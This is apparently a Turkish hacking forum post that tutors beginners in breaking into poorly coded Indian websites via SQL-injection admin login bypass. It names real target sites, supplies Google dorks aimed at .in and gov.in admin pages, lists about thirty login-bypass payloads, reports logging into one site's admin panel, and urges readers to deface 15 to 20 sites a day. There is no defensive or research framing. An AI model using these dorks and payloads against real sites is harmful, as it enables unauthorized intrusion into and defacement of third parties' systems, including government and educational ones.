Merhaba Ben Azazel
Öncelikle Hindistan 2 Milyara yaklaşmaya başlayan nüfusuyla gerçekten büyük bir ülke
Aynı Zamanda Fakir bir Ülke Bu da genel olarak sitelerinin bu fakirsizlikten kaynaklanması nedeniyle çoğu zaman çok ucuz ücretlere yapılıyor bu da başlangıç derecesinde bulunan hackerlara bir fırsat sunuyor.
Kötü kodlanmış site = Zaafiyetli site
Şöyle açıklayayım;
O kadar kötü yapılan siteler var ki 2024 yılına gireceğiz ve artık adını dahi almamamız gereken türden bir açık olan Admin Login bypass Açığın kullanacağız bu konumuzda
http://www.pcsamana.org.in/ şu siteye bir baksanıza
Nadiren görülür ve çok basit bir şekilde exploit edilir.
admin login sayfasında sql payloadları çalıştırırız ve admin olarak o sayfayı, güvenliği atlayıp devam ederiz
bu da bize sitenin adminin genel olarak tüm yetkisini sunar.
peki bu zaafiyetli siteleri nasıl bulacağız?
Tabii ki dorkları kullanarak!
Dorkları kullanarak genel olarak admin login pagelerini ve Hindistanı belirtecek anahtar kelimeleri kullanmamız gerekmekte.
Size Birkaç Dork Yazayım; inurl:admin.php inurl:.in
inurl:admin.html inurl:.in
inurl:admin inurl:.in
inurl:login/admin inurl:.in
inurl:login/admin inurl:.in
İNURL:.İN YERİNE SİTE:.İN DE BAŞARILI SONUÇLAR DÖNDÜRÜR
inurl:admin.asp inurl:.in
inurl:admin.aspx inurl:gov.in
inurl:login/admin.php inurl:gov.in
inurl:login/admin.asp inurl:gov.in
inurl:login/admin.aspx inurl:gov.in
Sadece 10 dakika içerisinde bu dorkları kullanarak
https://www.stet.edu.in/feedback/alumini/admin.php
bu sitenin
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1--
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"--
payloadlarını kullanarak admin paneline giriş yaptım
fakat içerisinde herhangi bir dosya yükleyebileceğim ya da herhangi bir site sayfasını değiştirebileceğim bir yer bulunmadığı için es geçiyorum. sizde bu şekilde bir gününüzü ayırarak şanslıysanız 15 20 site düşürebilirsiniz ve bu sitelerden 3 tanesinde upload bölümü bulunsa dahi 3 index demek olucak kısa günün karı
Bu taktik "ilk indeximi basayım aga" diyenler içindi. gelişmek isteyenler bu taktiği kullanmak yerine daha kapsamlı açıkları kullanarak kendilerini bir üst seviyeye taşıyabilirler
Bu ve bunun gibi konuların devamı için konumu beğenirseniz mükemmel olur
AZAZİL SUNAR.
